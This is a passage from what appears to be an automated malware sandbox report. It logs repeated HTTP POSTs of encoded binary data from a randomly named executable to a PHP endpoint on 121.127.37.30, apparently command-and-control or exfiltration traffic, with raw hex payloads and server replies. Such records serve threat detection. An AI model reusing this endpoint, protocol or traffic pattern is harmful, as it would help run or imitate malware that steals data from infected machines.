                                                Data Ascii: UV_\^XQ^^^QWPRZXYUXD[VR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9>!0.##*8 Y??>9+["<8(1X?8+$"??!Y""Z)
                                                Dec 5, 2024 16:03:10.588311911 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:10.820540905 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:10 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                37192.168.2.749879121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:11.069931030 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:11.424819946 CET2564OUTData Raw: 55 53 5a 53 5e 5d 54 5f 5e 5e 51 57 50 59 5a 5b 59 56 58 42 5b 53 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZS^]T_^^QWPYZ[YVXB[SRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:>&?%Q7 _>;?/**+^5'>,<8+$%U(!Y""Z))
                                                Dec 5, 2024 16:03:12.394375086 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:12.628321886 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:12 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                38192.168.2.749885121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:13.074640989 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:13.424808025 CET2564OUTData Raw: 50 5e 5a 5b 5b 5c 51 5a 5e 5e 51 57 50 5f 5a 5d 59 53 58 41 5b 53 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P^Z[[\QZ^^QWP_Z]YSXA[SRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9X*2'?7$^=;]?5$\)*7["/<)17Y(839T+/!Y""Z)1
                                                Dec 5, 2024 16:03:14.396090031 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:14.652307034 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:14 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                39192.168.2.749887121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:14.886394024 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:15.238333941 CET2560OUTData Raw: 55 55 5a 5d 5b 5f 54 52 5e 5e 51 57 50 5a 5a 5f 59 56 58 40 5b 50 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZ][_TR^^QWPZZ_YVX@[PRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:+<5'-V#7)+0<%'>67T*"<?8^3%+!Y""Z)=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                40192.168.2.749892121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:15.829561949 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:16.174818993 CET1452OUTData Raw: 50 55 5a 5b 5e 58 54 5c 5e 5e 51 57 50 5f 5a 5e 59 50 58 45 5b 55 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PUZ[^XT\^^QWP_Z^YPXE[URQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*,!0* )<+)Y ?*!++,$-1*/!Y""Z)1
                                                Dec 5, 2024 16:03:17.153656960 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:17.388396025 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:16 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 58 34 3e 22 5b 20 29 37 52 2e 00 20 5b 33 30 26 41 32 30 2c 12 31 13 13 1c 27 3b 33 55 35 38 24 06 35 39 28 04 23 59 33 11 30 0d 28 46 0c 1d 21 06 33 16 0f 56 2a 39 2c 56 3b 5a 3a 1a 3d 23 0c 59 2e 3e 22 54 3e 20 29 11 3c 00 39 0f 32 2b 34 10 33 03 3a 17 3f 33 05 11 33 35 20 53 00 14 26 0c 2a 08 3d 1e 29 01 29 5d 21 12 3f 0f 28 3b 0f 07 31 38 29 0e 32 37 23 59 32 29 2f 0d 23 09 28 0f 3d 10 25 03 26 5a 38 11 28 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: X4>"[ )7R. [30&A20,1';3U58$59(#Y30(F!3V*9,V;Z:=#Y.>"T> )<92+43:?335 S&*=))]!?(;18)27#Y2)/#(=%&Z8(#&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                41192.168.2.749893121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:15.968014956 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:16.315506935 CET2564OUTData Raw: 50 53 5a 52 5e 51 51 5e 5e 5e 51 57 50 5e 5a 50 59 5c 58 46 5b 53 52 5a 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZR^QQ^^^QWP^ZPY\XF[SRZ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*/-':448)Y<$Z=Z"?(2+<^03=9R+/!Y""Z)5
                                                Dec 5, 2024 16:03:17.292315006 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:17.528772116 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:17 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                42192.168.2.749899121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:17.816657066 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:18.174834013 CET2564OUTData Raw: 50 5f 5a 5b 5b 5b 51 5e 5e 5e 51 57 50 52 5a 50 59 55 58 47 5b 5e 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P_Z[[[Q^^^QWPRZPYUXG[^R[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9X*<"':7Y)8$>%]*9?Z!<7W(!_?;?$=&(/!Y""Z)
                                                Dec 5, 2024 16:03:18.424844980 CET1236OUTData Raw: 38 08 31 3c 08 3b 10 17 33 01 06 50 36 05 21 0b 32 0a 17 39 31 5b 3d 57 27 33 22 2d 12 2a 21 2d 3d 02 27 03 24 04 39 1f 32 55 0e 21 0c 23 58 14 3f 5e 08 2b 37 22 14 08 33 3d 3e 2a 0a 3d 5c 21 37 05 39 20 39 29 21 50 3c 41 38 3f 26 38 58 17 34 50
                                                Data Ascii: 81<;3P6!291[=W'3"-*!-='$92U!#X?^+7"3=>*=\!79 9)!P<A8?&8X4P52,?<$]B&;$=<4$>81<89;2>^R?%/#8Z8$U')R)8678$'7>1<00\[0;0\979.>&3>9>R$0?' !Y7+-'91*?">.A")5?;8
                                                Dec 5, 2024 16:03:19.137427092 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:19.372514009 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:18 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                43192.168.2.749901121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:19.619981050 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:19.971692085 CET2564OUTData Raw: 50 54 5f 58 5b 5a 54 5d 5e 5e 51 57 50 53 5a 5b 59 57 58 43 5b 50 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PT_X[ZT]^^QWPSZ[YWXC[PRP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:=?5$/!P"7 ^)0+$X>:4!4(",++ _$-U(/!Y""Z)
                                                Dec 5, 2024 16:03:20.958195925 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:21.194737911 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:20 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                44192.168.2.749907121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:21.584647894 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:21.940454006 CET2564OUTData Raw: 50 5f 5f 59 5b 5c 54 59 5e 5e 51 57 50 5e 5a 5a 59 5d 58 48 5b 55 52 50 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P__Y[\TY^^QWP^ZZY]XH[URP[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9_)<13)U7$8X=(_<8Z=3Z!?<*1'?(8^&-9W*?!Y""Z)5


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                45192.168.2.749912121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:22.514621019 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:22.862322092 CET1452OUTData Raw: 50 51 5a 52 5b 5b 54 5b 5e 5e 51 57 50 59 5a 58 59 57 58 42 5b 51 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZR[[T[^^QWPYZXYWXB[QR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:*2Y040X*(?+5*:<6;W*+^;'-<?!Y""Z))
                                                Dec 5, 2024 16:03:23.845140934 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:24.081031084 CET380INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 59 20 5b 3e 13 37 3a 2c 0c 3a 58 23 04 27 09 3e 40 32 0a 30 59 27 2e 36 09 25 5d 33 55 21 5d 2f 15 21 17 23 59 37 11 3c 05 26 37 28 46 0c 1d 21 00 24 16 22 09 3e 2a 3f 0d 2f 02 25 42 2a 23 03 01 2d 3d 35 0d 3d 23 3d 57 28 3a 36 57 26 28 3c 10 27 5c 2e 17 2b 0d 24 07 27 1f 20 53 00 14 25 53 3e 32 21 57 2a 01 22 00 20 2f 30 12 3f 05 03 03 32 38 29 0c 25 27 3c 01 26 5f 34 57 20 0e 2f 1f 2a 2e 0c 5d 31 02 0e 58 2a 33 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: Y [>7:,:X#'>@20Y'.6%]3U!]/!#Y7<&7(F!$">*?/%B*#-=5=#=W(:6W&(<'\.+$' S%S>2!W*" /0?28)%'<&_4W /*.]1X*3&\! W=YV


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                46192.168.2.749913121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:22.636398077 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:22.987365961 CET2564OUTData Raw: 50 55 5a 5a 5e 5b 54 58 5e 5e 51 57 50 5c 5a 59 59 51 58 47 5b 50 52 58 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PUZZ^[TX^^QWP\ZYYQXG[PRX[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*Y23-#48X+8<?[=:#"?T(!/(+0'6?/!Y""Z)=
                                                Dec 5, 2024 16:03:23.961242914 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:24.200490952 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                47192.168.2.749919121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:24.448065996 CET447OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:24.799879074 CET2564OUTData Raw: 50 50 5f 5f 5e 58 54 5f 5e 5e 51 57 50 58 5a 5a 59 55 58 41 5b 56 52 5b 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PP__^XT_^^QWPXZZYUXA[VR[[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9**0Y&#70>](<Z*_("="((8$-%W*?!Y""Z)-
                                                Dec 5, 2024 16:03:25.772784948 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:26.008744955 CET151INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:25 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                48192.168.2.749921121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 5, 2024 16:03:26.266463041 CET471OUTPOST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:26.612371922 CET2564OUTData Raw: 50 51 5a 52 5b 58 54 5a 5e 5e 51 57 50 5e 5a 5f 59 53 58 40 5b 5f 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PQZR[XTZ^^QWP^Z_YSX@[_RY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9]=Y)&?2#'Y=8;?(Y>5/(! *+?'-!T<!Y""Z)5
                                                Dec 5, 2024 16:03:27.582731009 CET25INHTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:27.816467047 CET207INHTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:27 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.2.749926121.127.37.30807528C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
